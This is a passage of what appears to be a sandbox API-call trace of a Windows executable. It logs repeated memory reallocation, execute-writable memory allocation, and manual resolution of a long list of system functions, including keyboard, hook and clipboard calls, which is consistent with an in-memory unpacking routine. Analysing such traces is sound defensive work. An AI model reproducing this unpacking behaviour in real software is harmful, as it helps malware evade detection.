GlobalUnlock (hMem=0xcc008c) returned 0 [0280.378] GlobalReAlloc (hMem=0xcc008c, dwBytes=0x280000, uFlags=0x2) returned 0xcc008c [0280.440] GlobalLock (hMem=0xcc008c) returned 0x5c20020 [0280.442] GlobalHandle (pMem=0x5c20020) returned 0xcc008c [0280.442] GlobalUnlock (hMem=0xcc008c) returned 0 [0280.442] GlobalReAlloc (hMem=0xcc008c, dwBytes=0x282000, uFlags=0x2) returned 0xcc008c [0280.507] GlobalLock (hMem=0xcc008c) returned 0x5fc0020 [0280.508] GlobalHandle (pMem=0x5fc0020) returned 0xcc008c [0280.508] GlobalUnlock (hMem=0xcc008c) returned 0 [0280.508] GlobalReAlloc (hMem=0xcc008c, dwBytes=0x284000, uFlags=0x2) returned 0xcc008c [0280.582] GlobalLock (hMem=0xcc008c) returned 0x5c20020 [0280.583] GlobalHandle (pMem=0x5c20020) returned 0xcc008c [0280.583] GlobalUnlock (hMem=0xcc008c) returned 0 [0280.583] GlobalReAlloc (hMem=0xcc008c, dwBytes=0x286000, uFlags=0x2) returned 0xcc008c [0280.652] GlobalLock (hMem=0xcc008c) returned 0x5fc0020 [0280.653] GlobalHandle (pMem=0x5fc0020) returned 0xcc008c [0280.653] GlobalUnlock (hMem=0xcc008c) returned 0 [0280.653] GlobalReAlloc (hMem=0xcc008c, dwBytes=0x288000, uFlags=0x2) returned 0xcc008c [0280.729] GlobalLock (hMem=0xcc008c) returned 0x5c20020 [0280.730] GlobalHandle (pMem=0x5c20020) returned 0xcc008c [0280.730] GlobalUnlock (hMem=0xcc008c) returned 0 [0280.730] GlobalReAlloc (hMem=0xcc008c, dwBytes=0x28a000, uFlags=0x2) returned 0xcc008c [0280.798] GlobalLock (hMem=0xcc008c) returned 0x5fc0020 [0280.799] GlobalHandle (pMem=0x5fc0020) returned 0xcc008c [0280.799] GlobalUnlock (hMem=0xcc008c) returned 0 [0280.799] GlobalReAlloc (hMem=0xcc008c, dwBytes=0x28c000, uFlags=0x2) returned 0xcc008c [0280.875] GlobalLock (hMem=0xcc008c) returned 0x5c20020 [0280.876] GlobalHandle (pMem=0x5c20020) returned 0xcc008c [0280.876] GlobalUnlock (hMem=0xcc008c) returned 0 [0280.876] GlobalReAlloc (hMem=0xcc008c, dwBytes=0x28e000, uFlags=0x2) returned 0xcc008c [0280.944] GlobalLock (hMem=0xcc008c) returned 0x5fc0020 [0280.945] GlobalHandle (pMem=0x5fc0020) returned 0xcc008c [0280.945] GlobalUnlock (hMem=0xcc008c) returned 0 [0280.945] GlobalReAlloc (hMem=0xcc008c, dwBytes=0x290000, uFlags=0x2) returned 0xcc008c [0281.022] GlobalLock (hMem=0xcc008c) returned 0x5c20020 [0281.024] GlobalHandle (pMem=0x5c20020) returned 0xcc008c [0281.024] GlobalUnlock (hMem=0xcc008c) returned 0 [0281.024] GlobalReAlloc (hMem=0xcc008c, dwBytes=0x292000, uFlags=0x2) returned 0xcc008c [0281.103] GlobalLock (hMem=0xcc008c) returned 0x5fc0020 [0281.104] VirtualAlloc (lpAddress=0x0, dwSize=0x2a0000, flAllocationType=0x2000, flProtect=0x1) returned 0x5c20000 [0281.104] VirtualAlloc (lpAddress=0x5c20000, dwSize=0x294000, flAllocationType=0x1000, flProtect=0x4) returned 0x5c20000 [0281.173] GlobalHandle (pMem=0x5fc0020) returned 0xcc008c [0281.173] GlobalUnlock (hMem=0xcc008c) returned 0 [0281.192] VirtualAlloc (lpAddress=0x400000, dwSize=0x29c000, flAllocationType=0x2000, flProtect=0x4) returned 0x0 [0281.192] VirtualAlloc (lpAddress=0x0, dwSize=0x29c000, flAllocationType=0x2000, flProtect=0x4) returned 0x5fc0000 [0281.192] VirtualAlloc (lpAddress=0x5fc0000, dwSize=0x29c000, flAllocationType=0x1000, flProtect=0x4) returned 0x5fc0000 [0281.201] VirtualAlloc (lpAddress=0x5fc0000, dwSize=0x400, flAllocationType=0x1000, flProtect=0x4) returned 0x5fc0000 [0281.201] VirtualAlloc (lpAddress=0x5fc1000, dwSize=0x23d400, flAllocationType=0x1000, flProtect=0x40) returned 0x5fc1000 [0281.268] VirtualAlloc (lpAddress=0x61ff000, dwSize=0x2200, flAllocationType=0x1000, flProtect=0x40) returned 0x61ff000 [0281.268] VirtualAlloc (lpAddress=0x6202000, dwSize=0xb400, flAllocationType=0x1000, flProtect=0x40) returned 0x6202000 [0281.270] VirtualAlloc (lpAddress=0x620e000, dwSize=0x1000, flAllocationType=0x1000, flProtect=0x40) returned 0x620e000 [0281.270] VirtualAlloc (lpAddress=0x6214000, dwSize=0x3800, flAllocationType=0x1000, flProtect=0x40) returned 0x6214000 [0281.270] VirtualAlloc (lpAddress=0x6218000, dwSize=0xa00, flAllocationType=0x1000, flProtect=0x40) returned 0x6218000 [0281.270] VirtualAlloc (lpAddress=0x6219000, dwSize=0x34600, flAllocationType=0x1000, flProtect=0x40) returned 0x6219000 [0281.276] VirtualAlloc (lpAddress=0x624e000, dwSize=0xd400, flAllocationType=0x1000, flProtect=0x40) returned 0x624e000 [0281.280] IsBadReadPtr (lp=0x6214000, ucb=0x14) returned 0 [0281.280] LoadLibraryA (lpLibFileName="oleaut32.dll") returned 0x77a00000 [0281.280] GetProcAddress (hModule=0x77a00000, lpProcName="SysFreeString") returned 0x77a03e59 [0281.281] GetProcAddress (hModule=0x77a00000, lpProcName="SysReAllocStringLen") returned 0x77a07810 [0281.281] GetProcAddress (hModule=0x77a00000, lpProcName="SysAllocStringLen") returned 0x77a045d2 [0281.281] IsBadReadPtr (lp=0x6214014, ucb=0x14) returned 0 [0281.281] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77130000 [0281.282] GetProcAddress (hModule=0x77130000, lpProcName="RegQueryValueExW") returned 0x771446ad [0281.282] GetProcAddress (hModule=0x77130000, lpProcName="RegOpenKeyExW") returned 0x7714468d [0281.283] GetProcAddress (hModule=0x77130000, lpProcName="RegCloseKey") returned 0x7714469d [0281.283] IsBadReadPtr (lp=0x6214028, ucb=0x14) returned 0 [0281.283] LoadLibraryA (lpLibFileName="user32.dll") returned 0x76270000 [0281.283] GetProcAddress (hModule=0x76270000, lpProcName="MessageBoxA") returned 0x762cea11 [0281.284] GetProcAddress (hModule=0x76270000, lpProcName="CharNextW") returned 0x76280be6 [0281.284] GetProcAddress (hModule=0x76270000, lpProcName="LoadStringW") returned 0x7627dfba [0281.284] IsBadReadPtr (lp=0x621403c, ucb=0x14) returned 0 [0281.284] LoadLibraryA (lpLibFileName="kernel32.dll") returned 0x77780000 [0281.285] GetProcAddress (hModule=0x77780000, lpProcName="Sleep") returned 0x777cba46 [0281.285] GetProcAddress (hModule=0x77780000, lpProcName="VirtualFree") returned 0x777d1da4 [0281.286] GetProcAddress (hModule=0x77780000, lpProcName="VirtualAlloc") returned 0x777d2fb6 [0281.286] GetProcAddress (hModule=0x77780000, lpProcName="lstrlenW") returned 0x777cd9e8 [0281.286] GetProcAddress (hModule=0x77780000, lpProcName="VirtualQuery") returned 0x777d76d6 [0281.287] GetProcAddress (hModule=0x77780000, lpProcName="QueryPerformanceCounter") returned 0x777cbb9f [0281.287] GetProcAddress (hModule=0x77780000, lpProcName="GetTickCount") returned 0x777cba60 [0281.287] GetProcAddress (hModule=0x77780000, lpProcName="GetSystemInfo") returned 0x777d3728 [0281.288] GetProcAddress (hModule=0x77780000, lpProcName="GetVersion") returned 0x777c154e [0281.288] GetProcAddress (hModule=0x77780000, lpProcName="CompareStringW") returned 0x777c9bee [0281.288] GetProcAddress (hModule=0x77780000, lpProcName="IsValidLocale") returned 0x777c3de4 [0281.289] GetProcAddress (hModule=0x77780000, lpProcName="SetThreadLocale") returned 0x777e88e6 [0281.289] GetProcAddress (hModule=0x77780000, lpProcName="GetSystemDefaultUILanguage") returned 0x777b731d [0281.289] GetProcAddress (hModule=0x77780000, lpProcName="GetUserDefaultUILanguage") returned 0x777c22ef [0281.290] GetProcAddress (hModule=0x77780000, lpProcName="GetLocaleInfoW") returned 0x777d6596 [0281.290] GetProcAddress (hModule=0x77780000, lpProcName="WideCharToMultiByte") returned 0x777d450e [0281.291] GetProcAddress (hModule=0x77780000, lpProcName="MultiByteToWideChar") returned 0x777d452b [0281.291] GetProcAddress (hModule=0x77780000, lpProcName="GetACP") returned 0x777d39aa [0281.291] GetProcAddress (hModule=0x77780000, lpProcName="LoadLibraryExW") returned 0x777c4775 [0281.292] GetProcAddress (hModule=0x77780000, lpProcName="GetStartupInfoW") returned 0x777d3891 [0281.292] GetProcAddress (hModule=0x77780000, lpProcName="GetProcAddress") returned 0x777d33d3 [0281.292] GetProcAddress (hModule=0x77780000, lpProcName="GetModuleHandleW") returned 0x777d374d [0281.293] GetProcAddress (hModule=0x77780000, lpProcName="GetModuleFileNameW") returned 0x777d3c26 [0281.293] GetProcAddress (hModule=0x77780000, lpProcName="GetCommandLineW") returned 0x777d679e [0281.294] GetProcAddress (hModule=0x77780000, lpProcName="FreeLibrary") returned 0x777cd9d0 [0281.294] GetProcAddress (hModule=0x77780000, lpProcName="GetLastError") returned 0x777cbf00 [0281.294] GetProcAddress (hModule=0x77780000, lpProcName="UnhandledExceptionFilter") returned 0x777ded38 [0281.295] GetProcAddress (hModule=0x77780000, lpProcName="RtlUnwind") returned 0x777b7f70 [0281.295] GetProcAddress (hModule=0x77780000, lpProcName="RaiseException") returned 0x777beb60 [0281.295] GetProcAddress (hModule=0x77780000, lpProcName="ExitProcess") returned 0x777d214f [0281.296] GetProcAddress (hModule=0x77780000, lpProcName="ExitThread") returned 0x77b8f611 [0281.296] GetProcAddress (hModule=0x77780000, lpProcName="SwitchToThread") returned 0x777beb24 [0281.296] GetProcAddress (hModule=0x77780000, lpProcName="GetCurrentThreadId") returned 0x777cbb80 [0281.297] GetProcAddress (hModule=0x77780000, lpProcName="CreateThread") returned 0x777d375d [0281.297] GetProcAddress (hModule=0x77780000, lpProcName="DeleteCriticalSection") returned 0x77bb9ac5 [0281.297] GetProcAddress (hModule=0x77780000, lpProcName="LeaveCriticalSection") returned 0x77ba7760 [0281.298] GetProcAddress (hModule=0x77780000, lpProcName="EnterCriticalSection") returned 0x77ba77a0 [0281.298] GetProcAddress (hModule=0x77780000, lpProcName="InitializeCriticalSection") returned 0x77bba149 [0281.299] GetProcAddress (hModule=0x77780000, lpProcName="FindFirstFileW") returned 0x777d53b2 [0281.299] GetProcAddress (hModule=0x77780000, lpProcName="FindClose") returned 0x777d0e62 [0281.299] GetProcAddress (hModule=0x77780000, lpProcName="WriteFile") returned 0x777d1400 [0281.300] GetProcAddress (hModule=0x77780000, lpProcName="GetStdHandle") returned 0x777d1e46 [0281.300] GetProcAddress (hModule=0x77780000, lpProcName="CloseHandle") returned 0x777cca7c [0281.300] IsBadReadPtr (lp=0x6214050, ucb=0x14) returned 0 [0281.300] LoadLibraryA (lpLibFileName="kernel32.dll") returned 0x77780000 [0281.301] GetProcAddress (hModule=0x77780000, lpProcName="GetProcAddress") returned 0x777d33d3 [0281.301] GetProcAddress (hModule=0x77780000, lpProcName="RaiseException") returned 0x777beb60 [0281.301] GetProcAddress (hModule=0x77780000, lpProcName="LoadLibraryA") returned 0x777d395c [0281.302] GetProcAddress (hModule=0x77780000, lpProcName="GetLastError") returned 0x777cbf00 [0281.302] GetProcAddress (hModule=0x77780000, lpProcName="TlsSetValue") returned 0x777cda88 [0281.302] GetProcAddress (hModule=0x77780000, lpProcName="TlsGetValue") returned 0x777cda70 [0281.303] GetProcAddress (hModule=0x77780000, lpProcName="TlsFree") returned 0x777d13b8 [0281.303] GetProcAddress (hModule=0x77780000, lpProcName="TlsAlloc") returned 0x777d35a1 [0281.304] GetProcAddress (hModule=0x77780000, lpProcName="LocalFree") returned 0x777cca64 [0281.304] GetProcAddress (hModule=0x77780000, lpProcName="LocalAlloc") returned 0x777d3363 [0281.304] GetProcAddress (hModule=0x77780000, lpProcName="FreeLibrary") returned 0x777cd9d0 [0281.304] IsBadReadPtr (lp=0x6214064, ucb=0x14) returned 0 [0281.304] LoadLibraryA (lpLibFileName="user32.dll") returned 0x76270000 [0281.305] GetProcAddress (hModule=0x76270000, lpProcName="SetClassLongW") returned 0x7627658b [0281.305] GetProcAddress (hModule=0x76270000, lpProcName="GetClassLongW") returned 0x76283860 [0281.306] GetProcAddress (hModule=0x76270000, lpProcName="SetWindowLongW") returned 0x76284449 [0281.306] GetProcAddress (hModule=0x76270000, lpProcName="GetWindowLongW") returned 0x762861b8 [0281.306] GetProcAddress (hModule=0x76270000, lpProcName="CreateWindowExW") returned 0x7627ec7c [0281.307] GetProcAddress (hModule=0x76270000, lpProcName="keybd_event") returned 0x762cec3b [0281.307] GetProcAddress (hModule=0x76270000, lpProcName="WindowFromPoint") returned 0x762a6be9 [0281.307] GetProcAddress (hModule=0x76270000, lpProcName="WaitMessage") returned 0x762866bd [0281.308] GetProcAddress (hModule=0x76270000, lpProcName="WaitForInputIdle") returned 0x762a0397 [0281.308] GetProcAddress (hModule=0x76270000, lpProcName="UpdateWindow") returned 0x7627ffa8 [0281.309] GetProcAddress (hModule=0x76270000, lpProcName="UnregisterClassW") returned 0x7627b9ae [0281.309] GetProcAddress (hModule=0x76270000, lpProcName="UnhookWindowsHookEx") returned 0x7627adf9 [0281.309] GetProcAddress (hModule=0x76270000, lpProcName="TranslateMessage") returned 0x762864c7 [0281.310] GetProcAddress (hModule=0x76270000, lpProcName="TranslateMDISysAccel") returned 0x762a1a5a [0281.310] GetProcAddress (hModule=0x76270000, lpProcName="TrackPopupMenu") returned 0x76292228 [0281.310] GetProcAddress (hModule=0x76270000, lpProcName="SystemParametersInfoW") returned 0x7627e09a [0281.311] GetProcAddress (hModule=0x76270000, lpProcName="SwitchDesktop") returned 0x7627476b [0281.311] GetProcAddress (hModule=0x76270000, lpProcName="ShowWindow") returned 0x7627f2a9 [0281.312] GetProcAddress (hModule=0x76270000, lpProcName="ShowScrollBar") returned 0x762a3c89 [0281.312] GetProcAddress (hModule=0x76270000, lpProcName="ShowOwnedPopups") returned 0x762a28ca [0281.312] GetProcAddress (hModule=0x76270000, lpProcName="ShowCaret") returned 0x76279334 [0281.313] GetProcAddress (hModule=0x76270000, lpProcName="SetWindowRgn") returned 0x762799ec [0281.313] GetProcAddress (hModule=0x76270000, lpProcName="SetWindowsHookExW") returned 0x7627e30c [0281.313] GetProcAddress (hModule=0x76270000, lpProcName="SetWindowTextW") returned 0x7628612b [0281.314] GetProcAddress (hModule=0x76270000, lpProcName="SetWindowPos") returned 0x76281bc4 [0281.314] GetProcAddress (hModule=0x76270000, lpProcName="SetWindowPlacement") returned 0x76277f78 [0281.315] GetProcAddress (hModule=0x76270000, lpProcName="SetTimer") returned 0x762852ef [0281.315] GetProcAddress (hModule=0x76270000, lpProcName="SetScrollRange") returned 0x76278ec5 [0281.315] GetProcAddress (hModule=0x76270000, lpProcName="SetScrollPos") returned 0x762a04be [0281.316] GetProcAddress (hModule=0x76270000, lpProcName="SetScrollInfo") returned 0x762848da [0281.316] GetProcAddress (hModule=0x76270000, lpProcName="SetRect") returned 0x7628498b [0281.317] GetProcAddress (hModule=0x76270000, lpProcName="SetPropW") returned 0x76285dc5 [0281.317] GetProcAddress (hModule=0x76270000, lpProcName="SetParent") returned 0x76278314 [0281.317] GetProcAddress (hModule=0x76270000, lpProcName="SetMenuItemInfoW") returned 0x76281799 [0281.318] GetProcAddress (hModule=0x76270000, lpProcName="SetMenu") returned 0x762a6b0e [0281.318] GetProcAddress (hModule=0x76270000, lpProcName="SetKeyboardState") returned 0x762a695a [0281.318] GetProcAddress (hModule=0x76270000, lpProcName="SetForegroundWindow") returned 0x7627b225 [0281.319] GetProcAddress (hModule=0x76270000, lpProcName="SetFocus") returned 0x7627abad [0281.319] GetProcAddress (hModule=0x76270000, lpProcName="SetCursorPos") returned 0x762bc1b0 [0281.320] GetProcAddress (hModule=0x76270000, lpProcName="SetCursor") returned 0x76283075 [0281.320] GetProcAddress (hModule=0x76270000, lpProcName="SetCapture") returned 0x762a6932 [0281.320] GetProcAddress (hModule=0x76270000, lpProcName="SetActiveWindow") returned 0x7628333a [0281.321] GetProcAddress (hModule=0x76270000, lpProcName="SendMessageTimeoutW") returned 0x7627e459 [0281.321] GetProcAddress (hModule=0x76270000, lpProcName="SendMessageA") returned 0x7627ad60 [0281.321] GetProcAddress (hModule=0x76270000, lpProcName="SendMessageW") returned 0x76285539 [0281.322] GetProcAddress (hModule=0x76270000, lpProcName="ScrollWindow") returned 0x7629fc1d [0281.322] GetProcAddress (hModule=0x76270000, lpProcName="ScreenToClient") returned 0x7627a506 [0281.323] GetProcAddress (hModule=0x76270000, lpProcName="RemovePropW") returned 0x76285fe1 [0281.323] GetProcAddress (hModule=0x76270000, lpProcName="RemoveMenu") returned 0x762786e8 [0281.323] GetProcAddress (hModule=0x76270000, lpProcName="ReleaseDC") returned 0x76285421 [0281.324] GetProcAddress (hModule=0x76270000, lpProcName="ReleaseCapture") returned 0x762a69f2 [0281.324] GetProcAddress (hModule=0x76270000, lpProcName="RegisterWindowMessageW") returned 0x7627df8d [0281.325] GetProcAddress (hModule=0x76270000, lpProcName="RegisterClipboardFormatW") returned 0x7627df8d [0281.325] GetProcAddress (hModule=0x76270000, lpProcName="RegisterClassW") returned 0x7627ed4a [0281.325] GetProcAddress (hModule=0x76270000, lpProcName="RedrawWindow") returned 0x762829bc [0281.326] GetProcAddress (hModule=0x76270000, lpProcName="PostQuitMessage") returned 0x7627b308 [0281.326] GetProcAddress (hModule=0x76270000, lpProcName="PostMessageW") returned 0x7628447b [0281.326] GetProcAddress (hModule=0x76270000, lpProcName="PeekMessageA") returned 0x762819a5 [0281.327] GetProcAddress (hModule=0x76270000, lpProcName="PeekMessageW") returned 0x7628634a [0281.327] GetProcAddress (hModule=0x76270000, lpProcName="OpenDesktopW") returned 0x7627c669 [0281.328] GetProcAddress (hModule=0x76270000, lpProcName="MsgWaitForMultipleObjectsEx") returned 0x7627e369 [0281.328] GetProcAddress (hModule=0x76270000, lpProcName="MsgWaitForMultipleObjects") returned 0x762837d8 [0281.328] GetProcAddress (hModule=0x76270000, lpProcName="MoveWindow") returned 0x76278d29 [0281.329] GetProcAddress (hModule=0x76270000, lpProcName="MessageBoxW") returned 0x762cea5f [0281.329] GetProcAddress (hModule=0x76270000, lpProcName="MessageBeep") returned 0x762a2939 [0281.329] GetProcAddress (hModule=0x76270000, lpProcName="MapWindowPoints") returned 0x76285caa [0281.330] GetProcAddress (hModule=0x76270000, lpProcName="MapVirtualKeyW") returned 0x762a6a7c [0281.330] GetProcAddress (hModule=0x76270000, lpProcName="LoadStringW") returned 0x7627dfba [0281.330] GetProcAddress (hModule=0x76270000, lpProcName="LoadKeyboardLayoutW") returned 0x762bc874 [0281.331] GetProcAddress (hModule=0x76270000, lpProcName="LoadIconW") returned 0x7627f142 [0281.331] GetProcAddress (hModule=0x76270000, lpProcName="LoadCursorW") returned 0x7627ed90 [0281.332] GetProcAddress (hModule=0x76270000, lpProcName="LoadBitmapW") returned 0x76276460 [0281.332] GetProcAddress (hModule=0x76270000, lpProcName="KillTimer") returned 0x762864f7 [0281.332] GetProcAddress (hModule=0x76270000, lpProcName="IsZoomed") returned 0x76284ce9 [0281.333] GetProcAddress (hModule=0x76270000, lpProcName="IsWindowVisible") returned 0x76284d69 [0281.333] GetProcAddress (hModule=0x76270000, lpProcName="IsWindowUnicode") returned 0x76282f55 [0281.333] GetProcAddress (hModule=0x76270000, lpProcName="IsWindowEnabled") returned 0x7627a9b9 [0281.334] GetProcAddress (hModule=0x76270000, lpProcName="IsWindow") returned 0x762853ba [0281.334] GetProcAddress (hModule=0x76270000, lpProcName="IsIconic") returned 0x76284c8e [0281.334] GetProcAddress (hModule=0x76270000, lpProcName="IsDialogMessageA") returned 0x76292019 [0281.335] GetProcAddress (hModule=0x76270000, lpProcName="IsDialogMessageW") returned 0x76284104 [0281.335] GetProcAddress (hModule=0x76270000, lpProcName="IsChild") returned 0x76283a83 [0281.336] GetProcAddress (hModule=0x76270000, lpProcName="InvalidateRect") returned 0x7628566d [0281.336] GetProcAddress (hModule=0x76270000, lpProcName="InsertMenuItemW") returned 0x7627aac5 [0281.336] GetProcAddress (hModule=0x76270000, lpProcName="InsertMenuW") returned 0x7627869a [0281.337] GetProcAddress (hModule=0x76270000, lpProcName="HideCaret") returned 0x76279348 [0281.337] GetProcAddress (hModule=0x76270000, lpProcName="GetWindowThreadProcessId") returned 0x7627ee32 [0281.337] GetProcAddress (hModule=0x76270000, lpProcName="GetWindowTextW") returned 0x7627b8c5 [0281.338] GetProcAddress (hModule=0x76270000, lpProcName="GetWindowRect") returned 0x7628558c [0281.338] GetProcAddress (hModule=0x76270000, lpProcName="GetWindowPlacement") returned 0x762a69de [0281.339] GetProcAddress (hModule=0x76270000, lpProcName="GetWindowDC") returned 0x76284ab7 [0281.339] GetProcAddress (hModule=0x76270000, lpProcName="GetTopWindow") returned 0x762a24d9 [0281.339] GetProcAddress (hModule=0x76270000, lpProcName="GetSystemMetrics") returned 0x762867cf [0281.342] GetProcAddress (hModule=0x76270000, lpProcName="GetSystemMenu") returned 0x7627fd8b [0281.342] GetProcAddress (hModule=0x76270000, lpProcName="GetSysColorBrush") returned 0x7627f1ed [0281.342] GetProcAddress (hModule=0x76270000, lpProcName="GetSysColor") returned 0x7628db7a [0281.343] GetProcAddress (hModule=0x76270000, lpProcName="GetSubMenu") returned 0x76279c19 [0281.343] GetProcAddress (hModule=0x76270000, lpProcName="GetScrollRange") returned 0x762a045a [0281.344] GetProcAddress (hModule=0x76270000, lpProcName="GetScrollPos") returned 0x762a0e43 [0281.344] GetProcAddress (hModule=0x76270000, lpProcName="GetScrollInfo") returned 0x76282da3 [0281.344] GetProcAddress (hModule=0x76270000, lpProcName="GetPropW") returned 0x76285bbe [0281.345] GetProcAddress (hModule=0x76270000, lpProcName="GetParent") returned 0x76286029 [0281.345] GetProcAddress (hModule=0x76270000, lpProcName="GetWindow") returned 0x76282780 [0281.345] GetProcAddress (hModule=0x76270000, lpProcName="GetMessageTime") returned 0x762a4231 [0281.346] GetProcAddress (hModule=0x76270000, lpProcName="GetMessagePos") returned 0x762a6703 [0281.346] GetProcAddress (hModule=0x76270000, lpProcName="GetMessageExtraInfo") returned 0x7627b705 [0281.347] GetProcAddress (hModule=0x76270000, lpProcName="GetMenuStringW") returned 0x762a6528 [0281.347] GetProcAddress (hModule=0x76270000, lpProcName="GetMenuState") returned 0x762a67d2 [0281.347] GetProcAddress (hModule=0x76270000, lpProcName="GetMenuItemInfoW") returned 0x7627aefa [0281.348] GetProcAddress (hModule=0x76270000, lpProcName="GetMenuItemID") returned 0x76279cd4 [0281.348] GetProcAddress (hModule=0x76270000, lpProcName="GetMenuItemCount") returned 0x7627ae39 [0281.348] GetProcAddress (hModule=0x76270000, lpProcName="GetMenu") returned 0x762a6b68 [0281.349] GetProcAddress (hModule=0x76270000, lpProcName="GetLastActivePopup") returned 0x762a6894 [0281.349] GetProcAddress (hModule=0x76270000, lpProcName="GetKeyboardState") returned 0x762a6946 [0281.350] GetProcAddress (hModule=0x76270000, lpProcName="GetKeyboardLayoutNameW") returned 0x762bfa13 [0281.350] GetProcAddress (hModule=0x76270000, lpProcName="GetKeyboardLayoutList") returned 0x7627935c [0281.350] GetProcAddress (hModule=0x76270000, lpProcName="GetKeyboardLayout") returned 0x76283800 [0281.351] GetProcAddress (hModule=0x76270000, lpProcName="GetKeyState") returned 0x76282b4d [0281.351] GetProcAddress (hModule=0x76270000, lpProcName="GetKeyNameTextW") returned 0x762bfa03 [0281.351] GetProcAddress (hModule=0x76270000, lpProcName="GetIconInfo") returned 0x76282989 [0281.352] GetProcAddress (hModule=0x76270000, lpProcName="GetGUIThreadInfo") returned 0x7628237e [0281.352] GetProcAddress (hModule=0x76270000, lpProcName="GetForegroundWindow") returned 0x7628335d [0281.353] GetProcAddress (hModule=0x76270000, lpProcName="GetFocus") returned 0x76283a34 [0281.353] GetProcAddress (hModule=0x76270000, lpProcName="GetDlgCtrlID") returned 0x7627b4e8 [0281.353] GetProcAddress (hModule=0x76270000, lpProcName="GetDesktopWindow") returned 0x762801a9 [0281.354] GetProcAddress (hModule=0x76270000, lpProcName="GetDCEx") returned 0x76282d57 [0281.354] GetProcAddress (hModule=0x76270000, lpProcName="GetDC") returned 0x7628544c [0281.354] GetProcAddress (hModule=0x76270000, lpProcName="GetCursorPos") returned 0x7627a4b3 [0281.355] GetProcAddress (hModule=0x76270000, lpProcName="GetCursor") returned 0x762a6408 [0281.355] GetProcAddress (hModule=0x76270000, lpProcName="GetClipboardData") returned 0x76292ba7 [0281.356] GetProcAddress (hModule=0x76270000, lpProcName="GetClientRect") returned 0x762854dd [0281.356] GetProcAddress (hModule=0x76270000, lpProcName="GetClassNameW") returned 0x76282a29 [0281.356] GetProcAddress (hModule=0x76270000, lpProcName="GetClassInfoExW") returned 0x7628095e [0281.357] GetProcAddress (hModule=0x76270000, lpProcName="GetClassInfoW") returned 0x76280ac2 [0281.357] GetProcAddress (hModule=0x76270000, lpProcName="GetCapture") returned 0x76279dc7 [0281.357] GetProcAddress (hModule=0x76270000, lpProcName="GetActiveWindow") returned 0x762a3b33 [0281.358] GetProcAddress (hModule=0x76270000, lpProcName="FrameRect") returned 0x762a0eb0 [0281.358] GetProcAddress (hModule=0x76270000, lpProcName="FindWindowExW") returned 0x762a712b [0281.359] GetProcAddress (hModule=0x76270000, lpProcName="FindWindowW") returned 0x7627ae0d [0281.359] GetProcAddress (hModule=0x76270000, lpProcName="FillRect") returned 0x76285d56 [0281.359] GetProcAddress (hModule=0x76270000, lpProcName="EnumWindows") returned 0x7628375b [0281.360] GetProcAddress (hModule=0x76270000, lpProcName="EnumThreadWindows") returned 0x7627b712 [0281.360] GetProcAddress (hModule=0x76270000, lpProcName="EnumChildWindows") returned 0x76282948 [0281.360] GetProcAddress (hModule=0x76270000, lpProcName="EndPaint") returned 0x76285d42 [0281.361] GetProcAddress (hModule=0x76270000, lpProcName="EndMenu") returned 0x76278302 [0281.361] GetProcAddress (hModule=0x76270000, lpProcName="EnableWindow") returned 0x76278d02 [0281.362] GetProcAddress (hModule=0x76270000, lpProcName="EnableScrollBar") returned 0x762a19ce [0281.362] GetProcAddress (hModule=0x76270000, lpProcName="EnableMenuItem") returned 0x762a43bc [0281.362] GetProcAddress (hModule=0x76270000, lpProcName="DrawTextExW") returned 0x76285894 [0281.363] GetProcAddress (hModule=0x76270000, lpProcName="DrawTextW") returned 0x76285b6a [0281.363] GetProcAddress (hModule=0x76270000, lpProcName="DrawMenuBar") returned 0x762a15ae [0281.363] GetProcAddress (hModule=0x76270000, lpProcName="DrawIconEx") returned 0x76282c32 [0281.364] GetProcAddress (hModule=0x76270000, lpProcName="DrawIcon") returned 0x76276427 [0281.364] GetProcAddress (hModule=0x76270000, lpProcName="DrawFrameControl") returned 0x7629b4f9 [0281.364] GetProcAddress (hModule=0x76270000, lpProcName="DrawFocusRect") returned 0x762a3091 [0281.365] GetProcAddress (hModule=0x76270000, lpProcName="DrawEdge") returned 0x7628311a [0281.365] GetProcAddress (hModule=0x76270000, lpProcName="DispatchMessageA") returned 0x76282e32 [0281.366] GetProcAddress (hModule=0x76270000, lpProcName="DispatchMessageW") returned 0x7628cc61 [0281.366] GetProcAddress (hModule=0x76270000, lpProcName="DestroyWindow") returned 0x7627b2f4 [0281.366] GetProcAddress (hModule=0x76270000, lpProcName="DestroyMenu") returned 0x762787f7 [0281.367] GetProcAddress (hModule=0x76270000, lpProcName="DestroyIcon") returned 0x7627a77f [0281.367] GetProcAddress (hModule=0x76270000, lpProcName="DestroyCursor") returned 0x7627a77f [0281.367] GetProcAddress (hModule=0x76270000, lpProcName="DeleteMenu") returned 0x762783c2 [0281.368] GetProcAddress (hModule=0x76270000, lpProcName="DefWindowProcW") returned 0x7628507d [0281.368] GetProcAddress (hModule=0x76270000, lpProcName="DefMDIChildProcW") returned 0x762a150a [0281.369] GetProcAddress (hModule=0x76270000, lpProcName="DefFrameProcW") returned 0x762a152b [0281.369] GetProcAddress (hModule=0x76270000, lpProcName="CreatePopupMenu") returned 0x7627867c [0281.369] GetProcAddress (hModule=0x76270000, lpProcName="CreateMenu") returned 0x762a6aed [0281.370] GetProcAddress (hModule=0x76270000, lpProcName="CreateIcon") returned 0x76297510 [0281.370] GetProcAddress (hModule=0x76270000, lpProcName="CreateDesktopW") returned 0x762740cf [0281.370] GetProcAddress (hModule=0x76270000, lpProcName="CopyImage") returned 0x762787a6 [0281.371] GetProcAddress (hModule=0x76270000, lpProcName="CloseDesktop") returned 0x7627c4ce [0281.371] GetProcAddress (hModule=0x76270000, lpProcName="ClientToScreen") returned 0x76281316 [0281.372] GetProcAddress (hModule=0x76270000, lpProcName="CheckMenuItem") returned 0x7629ee7c [0281.372] GetProcAddress (hModule=0x76270000, lpProcName="CharUpperBuffW") returned 0x7628ebd5 [0281.372] GetProcAddress (hModule=0x76270000, lpProcName="CharUpperW") returned 0x7628e981 [0281.373] GetProcAddress (hModule=0x76270000, lpProcName="CharNextW") returned 0x76280be6 [0281.373] GetProcAddress (hModule=0x76270000, lpProcName="CharLowerBuffW") returned 0x76283afe [0281.373] GetProcAddress (hModule=0x76270000, lpProcName="CharLowerW") returned 0x7627ba8a [0281.374] GetProcAddress (hModule=0x76270000, lpProcName="CallWindowProcW") returned 0x76281b3c [0281.374] GetProcAddress (hModule=0x76270000, lpProcName="CallNextHookEx") returned 0x7627abe1 [0281.374] GetProcAddress (hModule=0x76270000, lpProcName="BeginPaint") returned 0x76285d14 [0281.375] GetProcAddress (hModule=0x76270000, lpProcName="AdjustWindowRectEx") returned 0x762848ba [0281.375] GetProcAddress (hModule=0x76270000, 